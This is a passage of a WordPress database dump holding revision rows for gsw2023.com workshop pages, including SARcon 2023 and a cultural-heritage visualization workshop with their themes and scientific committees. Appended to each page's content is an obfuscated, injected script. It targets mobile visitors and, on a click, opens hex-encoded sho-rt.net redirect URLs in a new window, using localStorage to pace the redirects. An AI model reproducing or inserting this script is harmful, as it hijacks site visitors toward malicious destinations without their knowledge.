_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2023-02-13 02:48:20','2023-02-13 02:48:20','',2949,'https://gsw2023.com/?p=3893',0,'revision','',0),
(3894,1,'2023-02-14 04:24:03','2023-02-14 04:24:03','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SARcon 2023 - SAR constellations and applications</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\n<table style=\"font-weight: 400;\" width=\"877\">\n<tbody>\n<tr>\n<td width=\"105\">Tupin</td>\n<td width=\"104\">Florence</td>\n<td width=\"668\">Télécom Paris</td>\n</tr>\n<tr>\n<td width=\"105\">Gong</td>\n<td width=\"104\">Jianya</td>\n<td width=\"668\">Wuhan University, China</td>\n</tr>\n<tr>\n<td width=\"105\">Schmitt</td>\n<td width=\"104\">Michael</td>\n<td width=\"668\">University of the Bundeswehr Munich</td>\n</tr>\n<tr>\n<td width=\"105\">Ding</td>\n<td width=\"104\">Chibiao</td>\n<td width=\"668\"></td>\n</tr>\n<tr>\n<td width=\"105\">Deng</td>\n<td width=\"104\">Yunkai</td>\n<td width=\"668\"></td>\n</tr>\n<tr>\n<td width=\"105\">Demir</td>\n<td width=\"104\">Nusret</td>\n<td width=\"668\">Akdeniz University, Dept.of Space Science and Technologies, Antalya, Türkiye</td>\n</tr>\n<tr>\n<td width=\"105\">Rosa</td>\n<td width=\"104\">Rafael</td>\n<td width=\"668\">Visiona Space Technology, Brazil</td>\n</tr>\n<tr>\n<td width=\"105\">Sanli</td>\n<td width=\"104\">Füsun Balik</td>\n<td width=\"668\">Yildiz Technical University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Mohamadi</td>\n<td width=\"104\">Bahaa</td>\n<td width=\"668\">INERSIA SAR MONITORING</td>\n</tr>\n<tr>\n<td width=\"105\">Shabahzi</td>\n<td width=\"104\">Mohzdeh</td>\n<td width=\"668\">Natural Resources Canada, Government of Canada</td>\n</tr>\n<tr>\n<td width=\"105\">Sica</td>\n<td width=\"104\">Francescopaolo</td>\n<td width=\"668\">University of the Bundeswehr Munich</td>\n</tr>\n<tr>\n<td width=\"105\">Crespi</td>\n<td width=\"104\">Mattia</td>\n<td width=\"668\">Sapienza University of Rome, Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Crosetto</td>\n<td width=\"104\">Michele</td>\n<td width=\"668\">Centre Tecnològic de Telecomunicacions de Catalunya (CTTC), Spain</td>\n</tr>\n<tr>\n<td width=\"105\">ElGharbawi</td>\n<td width=\"104\">Tamer</td>\n<td width=\"668\">Suez Canal University, Egypt</td>\n</tr>\n<tr>\n<td width=\"105\">Hänsch</td>\n<td width=\"104\">Ronny</td>\n<td width=\"668\">DLR, Germany</td>\n</tr>\n<tr>\n<td width=\"105\">Sica</td>\n<td width=\"104\">Francescopaolo</td>\n<td width=\"668\">University of the Bundeswehr Munich, Germany</td>\n</tr>\n<tr>\n<td width=\"105\">Abdikan</td>\n<td width=\"104\">Saygin</td>\n<td width=\"668\">Hacettepe University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Üstüner</td>\n<td width=\"104\">Mustafa</td>\n<td width=\"668\">Artvin Coruh University, Turkey</td>\n</tr>\n<tr>\n<td width=\"105\">Pepe</td>\n<td width=\"104\">Antonio</td>\n<td width=\"668\">Institute for Electromagnetic Sesning of Environment (IREA), Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Calò</td>\n<td width=\"104\">Fabiana</td>\n<td width=\"668\">Institute for Electromagnetic Sesning of Environment (IREA), Italy</td>\n</tr>\n<tr>\n<td width=\"105\">Shafiyoddin</td>\n<td width=\"104\">Sayyad</td>\n<td width=\"668\">Milliya Arts, Science &amp; Management Science College, India</td>\n</tr>\n<tr>\n<td width=\"105\">Erten</td>\n<td width=\"104\">Esra</td>\n<td width=\"668\">Istanbul Technical University, Dept.of Geomatics Engineering, Istanbul, Türkiye</td>\n</tr>\n<tr>\n<td width=\"105\">Lazecky</td>\n<td width=\"104\">Milan</td>\n<td width=\"668\">School of Earth and Environment, University of Leeds , UK</td>\n</tr>\n</tbody>\n</table>\n<h6></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2023-02-14 04:24:03','2023-02-14 04:24:03','',2736,'https://gsw2023.com/?p=3894',0,'revision','',0),
(3897,1,'2023-03-01 22:35:39','2023-03-01 22:35:39','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\r\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\r\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong>Themes of Event</strong></h5>\r\n<strong>Cultural heritage cognition and conceptual modeling</strong>\r\n<ul>\r\n 	<li>Cognition and ontology of cultural heritage</li>\r\n 	<li>Data integration and knowledge discovery</li>\r\n 	<li>GIS + HBIM integration of cultural heritage protection methods</li>\r\n 	<li>Visualization of cultural heritage ( Big Data, BIM/CIM, AR/VR/MR, AI)</li>\r\n 	<li>Conceptual modelling</li>\r\n 	<li>Intelligent interaction, visualization, and information update</li>\r\n</ul>\r\n<strong>Deterioration monitoring and assessment of culture heritage</strong>\r\n<ul>\r\n 	<li>Identification, extraction and analysis of heritage deteriorations</li>\r\n 	<li>Deep learning of heritage deteriorations: symptom classification and visualization</li>\r\n 	<li>Dynamic monitoring of heritage deteriorations based on hyperspectral and X-ray techniques</li>\r\n 	<li>Analysis of the causes of heritage deteriorations</li>\r\n 	<li>Immersive heritage deteriorations diagnosis</li>\r\n 	<li>Evaluation and preventive protection of heritage deteriorations</li>\r\n 	<li>Automated deteriorations mapping</li>\r\n</ul>\r\n<strong>Digital twins and virtual restoration of cultural heritage</strong>\r\n<ul>\r\n 	<li>Digital twins</li>\r\n 	<li>Innovation technology of spatio-temporal information of cultural heritage</li>\r\n 	<li>Virtual restoration, recovery, and reconstruction of cultural heritage</li>\r\n 	<li>Digital storytelling presentation and interpretation of cultural heritage (space, material, value)</li>\r\n 	<li>New Methods of Cultural Heritage Protection in the Post-epidemic Era</li>\r\n</ul>\r\n<strong>Heritage sustainability and other applications</strong>\r\n<ul>\r\n 	<li>Cultural heritage conservation and sustainable development based on multi-source information fusion</li>\r\n 	<li>Sustainable development of cultural heritage based on the expansion of existing UNSDGs indicators</li>\r\n 	<li>Digital cultural heritage applications and services</li>\r\n 	<li>Innovating immersive experience and the industry of culture and tourism</li>\r\n 	<li>Contextual education of cultural heritage</li>\r\n 	<li>Digital cultural heritage interactive conservation with Public Participation</li>\r\n 	<li>Archaeological prospecting using spatial technologies, including remote sensing, GIS, and GNSS.</li>\r\n 	<li>AI-powered identification of archaeological sites and/or landscapes</li>\r\n 	<li>Spatial analysis of the past human-enviroment interactions</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Scientific Committee</strong></h5>\r\n<ol>\r\n 	<li>Junshan Liu, McWhorter School of Building Science, Auburn University, USA.junshan.liu@auburn.edu</li>\r\n 	<li>Andreas Georgopoulos, Department of National Technical University of Athens, Laboratory of Photogrammetry, Greece, Email: <a href=\"mailto:drag@central.ntua.gr\">drag@central.ntua.gr</a></li>\r\n 	<li>AnRong Dang, Department of School of Architecture in Tsinghua University, China, Email: danrong@mail.tsinghua.edu.cn</li>\r\n 	<li>Bolognesi, Cecilia Maria, Department of Architecture, Built environment and Construction engineering (A.B.C.) , Politecnico di Milano, Milano, Italy, Email: <a href=\"mailto:cecilia.bolognesi@polimi.it\">bolognesi@polimi.it</a></li>\r\n 	<li>Chen Yang, Department of Tongji University, China, Email: <a href=\"mailto:chen.yang@tongji.edu.cn\">yang@tongji.edu.cn</a></li>\r\n 	<li>Fulong Chen, Department of The Aerospace Information Research Institute, China, Email: <a href=\"mailto:chenfl@aircas.ac.cn\">chenfl@aircas.ac.cn</a></li>\r\n 	<li>Grussenmeyer, Pierre, Department of Université de Strasbourg, INSA Strasbourg, CNRS, ICube Laboratory UMR 7357, Photogrammetry and Geomatics Group, 67000 Strasbourg, France, Email: <a href=\"mailto:pierre.grussenmeyer@insa-strasbourg.fr\">grussenmeyer@insa-strasbourg.fr</a></li>\r\n 	<li>Hallot, Pierre, Department of DIVA Art Archeology Heritage University of Liège, Belgian,Email: <a href=\"mailto:p.hallot@uliege.be\">hallot@uliege.be</a></li>\r\n 	<li>Hongtao Liu, Department of World Heritage Research Center in Southwest Jiaotong University, China, Email: <a href=\"mailto:bridge115@126.com\">bridge115@126.com</a></li>\r\n 	<li>Jie He, Department of School of Architecture in Tianjin University, China, Email: janushe@tju.edu.cn</li>\r\n 	<li>Long Ying, Department of School of Architecture in Tsinghua University,China, Email: <a href=\"mailto:ylong@mail.tsinghua.edu.cn\">ylong@mail.tsinghua.edu.cn</a></li>\r\n 	<li>Ona Vileikis, Department of University College London (UCL), England, Email: <a href=\"mailto:o.vileikis@ucl.ac.uk\">vileikis@ucl.ac.uk</a></li>\r\n 	<li>Prafulla Tarachand Janbade, Department of Chandigarh College of Architecture, India, Email: <a href=\"mailto:prafullatj@gmail.com\">prafullatj@gmail.com</a></li>\r\n 	<li>Tiwari, Reena,Department of Curtin University, Australia, Email: <a href=\"mailto:r.tiwari@curtin.edu.au\">r.tiwari@curtin.edu.au</a></li>\r\n 	<li>Victor Ferreira, Department of Lisbon School of Architecture, Lisbon, Email: <a href=\"mailto:victor.mota.ferreira@gmail.com\">victor.mota.ferreira@gmail.com</a></li>\r\n 	<li>Yuhua Wu, Department of Chinese Academy of Cultural Heritage, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">wuyuhua@cach.org.cn</a></li>\r\n 	<li>Shuqiang Lv, Department of Survey and Mapping, BUCEA, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">lvshuqiang@b</a>ucea.edu.cn</li>\r\n</ol>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 